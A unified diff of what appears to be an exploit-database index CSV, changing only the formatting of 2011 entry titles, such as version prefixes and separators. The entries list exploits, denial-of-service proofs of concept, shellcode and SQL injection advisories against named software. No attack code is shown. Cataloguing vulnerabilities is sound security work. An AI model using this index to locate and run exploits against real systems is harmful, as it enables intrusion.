id,file,description,date,author,platform,type,port 17347,platforms/php/webapps/17347.php,"Easy Media Script SQL Injection Vulnerability",2011-05-30,Lagripe-Dz,php,webapps,0 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 Multiple SQL Injection Vulnerabilities",2011-05-30,v3n0m,php,webapps,0 -17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 +17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 -17354,platforms/windows/remote/17354.py,"Easy Ftp Server v1.7.0.2 Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 +17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 -17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 v1450 Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 +17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Command Injection",2011-06-04,rgod,windows,webapps,0 17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 @@ -15089,7 +15089,7 @@ id,file,description,date,author,platform,type,port 17381,platforms/windows/remote/17381.txt,"Simple web-server 1.2 Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass mod)",2011-06-11,xsploitedsec,windows,local,0 -17387,platforms/windows/dos/17387.html,"UUSEE ActiveX <6.11.0412.1 Buffer Overflow vulnerability",2011-06-11,huimaozi,windows,dos,0 +17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow vulnerability",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.5 Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 @@ -15116,7 +15116,7 @@ id,file,description,date,author,platform,type,port 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability",2011-06-19,"Chip D3 Bi0s",php,webapps,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() exploit",2011-06-20,mr_me,windows,remote,0 -17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK v12.6 Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 +17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 @@ -15152,10 +15152,10 @@ id,file,description,date,author,platform,type,port 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 SQL Injection Vulnerability",2011-06-28,hamt0ry,php,webapps,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 -17459,platforms/windows/local/17459.txt,"Valve Steam Client Application v1559/1559 Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 +17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17460,platforms/windows/remote/17460.pl,"Kaillera Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0 17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability",2011-06-30,"Core Security",windows,dos,0 -17462,platforms/freebsd/remote/17462.txt,"OpenSSH 3.5p1 Remote Root Exploit for FreeBSD",2011-06-30,Kingcope,freebsd,remote,0 +17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,Kingcope,freebsd,remote,0 17463,platforms/linux/dos/17463.pl,"Rhythmbox (.m3u) Local Crash Poc",2011-06-30,Caddy-Dz,linux,dos,0 17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component SQL Injection Vulnerability",2011-07-01,"Caddy Dz",php,webapps,0 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 SQL Injection Vulnerabilities",2011-07-01,"SEC Consult",php,webapps,0 @@ -15163,43 +15163,43 @@ id,file,description,date,author,platform,type,port 17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe Opcode 27 Buffer Overflow",2011-07-01,metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass",2011-07-02,"muts and dookie",windows,remote,5555 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 Denial of Service Vulnerability",2011-07-03,X-h4ck,windows,dos,0 -17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 +17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 -17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager v1.2 SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 +17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 -17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager v1.2 SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 -17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 -17480,platforms/asp/webapps/17480.txt,"DmxReady Faqs Manager v1.2 SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 -17481,platforms/asp/webapps/17481.txt,"DmxReady Bilboard v1.2 SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 -17482,platforms/asp/webapps/17482.txt,"DmxReady Document Library Manager v1.2 SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 -17483,platforms/php/webapps/17483.txt,"DMXReady Account List Manager v1.2 SQL Injection Vulnerability",2011-07-04,Bellatrix,php,webapps,0 -17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager v1.2 SQL Injection Vulnerability",2011-07-04,Bellatrix,php,webapps,0 -17485,platforms/php/webapps/17485.txt,"PhpFood CMS v2.00 SQL Injection Vulnerability",2011-07-04,kaMtiEz,php,webapps,0 +17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 +17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 +17480,platforms/asp/webapps/17480.txt,"DmxReady Faqs Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 +17481,platforms/asp/webapps/17481.txt,"DmxReady Bilboard 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 +17482,platforms/asp/webapps/17482.txt,"DmxReady Document Library Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 +17483,platforms/php/webapps/17483.txt,"DMXReady Account List Manager 1.2 - SQL Injection Vulnerability",2011-07-04,Bellatrix,php,webapps,0 +17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection Vulnerability",2011-07-04,Bellatrix,php,webapps,0 +17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection Vulnerability",2011-07-04,kaMtiEz,php,webapps,0 17486,platforms/multiple/local/17486.php,"PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938",2011-07-04,"Jonathan Salwan",multiple,local,0 17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 Buffer Overflow Exploit (MSF)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 Buffer Overflow",2011-07-04,metasploit,windows,remote,0 -17491,platforms/unix/remote/17491.rb,"VSFTPD v2.3.4 Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 +17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 .ORD File Buffer Overflow Vulnerability (MSF)",2011-07-05,"James Fitts",windows,local,0 -17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library v1.2 SQL Injection Vulnerability",2011-07-05,Bellatrix,asp,webapps,0 +17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection Vulnerability",2011-07-05,Bellatrix,asp,webapps,0 17495,platforms/php/webapps/17495.txt,"BbZL.PhP File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 CSRF Exploit",2011-07-06,"Luis Santana",php,webapps,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability",2011-07-06,LiquidWorm,windows,dos,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server Buffer Overflow Vulnerability (MSF)",2011-07-07,"James Fitts",windows,remote,0 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 Buffer Overflow (MSF)",2011-07-07,"James Fitts",windows,local,0 -17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability",2011-07-07,kaMtiEz,php,webapps,0 +17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U Dos/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 -17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 +17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - .ZIP File Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 -17511,platforms/windows/local/17511.pl,"ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 -17512,platforms/windows/dos/17512.pl,"ZipItFast v3.0 .ZIP File Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 +17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 +17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",2011-07-09,metasploit,windows,remote,0 17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 Local File Inclusion Vulnerability",2011-07-09,Or4nG.M4N,php,webapps,0 @@ -15209,11 +15209,11 @@ id,file,description,date,author,platform,type,port 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",2011-07-10,metasploit,windows,remote,0 17522,platforms/php/webapps/17522.txt,"Fire Soft Board <= 2.0.1 Persistent XSS Vulnerability (admin panel)",2011-07-12,"_jill for A-S",php,webapps,0 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 -17524,platforms/php/webapps/17524.html,"Pandora FMS v3.2.1 Cross Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 +17524,platforms/php/webapps/17524.html,"Pandora FMS 3.2.1 - Cross Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Xmap 1.2.11 Joomla Component Blind SQL Injection",2011-07-12,jdc,php,webapps,0 17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 PASV Buffer Overflow PoC",2011-07-12,"Craig Freyman",windows,remote,0 17528,platforms/php/webapps/17528.txt,"LiteRadius <= 3.2 - Multiple Blind SQL Injection Vulnerabilities",2011-07-13,"Robert Cooper",php,webapps,0 -17529,platforms/php/webapps/17529.txt,"TCExam <=11.2.011 Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 +17529,platforms/php/webapps/17529.txt,"TCExam <= 11.2.011 - Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections",2011-07-14,jdc,php,webapps,0 17531,platforms/php/webapps/17531.txt,"PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17532,platforms/php/webapps/17532.txt,"PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 @@ -15223,7 +15223,7 @@ id,file,description,date,author,platform,type,port 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (MSF)",2011-07-18,"James Fitts",windows,remote,0 -17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 Integer overflow version 9.21.201.01",2011-07-17,metasploit,windows,remote,0 +17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer overflow",2011-07-17,metasploit,windows,remote,0 17544,platforms/windows/dos/17544.txt,"GDI+ CreateDashedPath Integer overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win32/shellcode/17545.txt,"win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes",2011-07-18,KaHPeSeSe,win32,shellcode,0 17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server REST, PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 @@ -15232,8 +15232,8 @@ id,file,description,date,author,platform,type,port 17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server ACCL Buffer Overflow Exploit",2011-07-19,mortis,windows,remote,0 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server Stored XSS Vulnerability",2011-07-20,"Sense of Security",jsp,webapps,0 17553,platforms/php/webapps/17553.txt,"Appointment Booking Pro Joomla Component LFI Vulnerability",2011-07-20,"Don Tukulesto",php,webapps,0 -17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister v2.03 CSRF Vulnerabilities",2011-07-21,Crazy_Hacker,php,webapps,0 -17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day",2011-07-21,FB1H2S,php,webapps,0 +17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - CSRF Vulnerabilities",2011-07-21,Crazy_Hacker,php,webapps,0 +17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x => 4.1.3 - (messagegroupid) SQL Injection Vulnerability 0day",2011-07-21,FB1H2S,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability",2011-07-21,v3n0m,php,webapps,0 17557,platforms/windows/remote/17557.html,"Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 17559,platforms/linux/shellcode/17559.c,"Linux x86 egghunt shellcode",2011-07-21,"Ali Raheem",linux,shellcode,0 @@ -15245,23 +15245,23 @@ id,file,description,date,author,platform,type,port 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17567,platforms/osx/dos/17567.txt,"Safari SVG DOM processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0 -17570,platforms/php/webapps/17570.txt,"Musicbox v3.7 and previous version Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 +17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 Cross Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 Remote Code Execution",2011-07-26,beford,php,webapps,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 -17578,platforms/windows/remote/17578.txt,"MinaliC Webserver v2.0 Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 +17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 Blind time-based SQL Injection (MSF)",2011-07-28,TecR0c,php,webapps,0 -17580,platforms/windows/dos/17580.py,"MyWebServer v1.0.3 Denial Of Service",2011-07-28,X-h4ck,windows,dos,0 -17581,platforms/windows/remote/17581.txt,"MyWebServer v1.0.3 Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 +17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial Of Service",2011-07-28,X-h4ck,windows,dos,0 +17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 -17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= v4.27 USER Command 0day Stack Buffer Overflow (MSF)",2011-07-31,mr_me,windows,remote,0 +17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command 0day Stack Buffer Overflow (MSF)",2011-07-31,mr_me,windows,remote,0 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0 @@ -15269,12 +15269,12 @@ id,file,description,date,author,platform,type,port 17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) 0day SQL injection vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 -17600,platforms/windows/local/17600.rb,"Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 +17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0 17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0 -17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player v3.0 Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 -17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards v2.1 Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 +17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 +17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal Multiple SQL Injection Vulnerabilities",2011-08-04,Netrondoank,multiple,webapps,0 17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 .fat Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0 17610,platforms/multiple/dos/17610.py,"OpenSLP Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 @@ -15301,16 +15301,16 @@ id,file,description,date,author,platform,type,port 17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 session hijacking",2011-08-07,seth,php,webapps,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 Persistent XSS Vulnerability",2011-08-08,v0nSch3lling,php,webapps,0 -17640,platforms/php/webapps/17640.txt,"BlogPHP v2 Persistent XSS Vulnerability",2011-08-09,Paulzz,php,webapps,0 -17641,platforms/php/webapps/17641.txt,"Lasernet CMS Version 1.5 SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0 -17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft v1.00 Local Crash",2011-08-09,NassRawI,windows,dos,0 +17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent XSS Vulnerability",2011-08-09,Paulzz,php,webapps,0 +17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0 +17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0 17644,platforms/php/webapps/17644.txt,"FCKeditor all version Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0 17645,platforms/hardware/remote/17645.py,"iPhone/iPad Phone Drive 1.1.1 Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0 -17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 +17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector Remote Root Shell for Linux",2011-08-10,SZ,linux,remote,0 -17649,platforms/windows/remote/17649.py,"BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 +17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 @@ -15318,7 +15318,7 @@ id,file,description,date,author,platform,type,port 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17659,platforms/windows/remote/17659.rb,"MS10-026 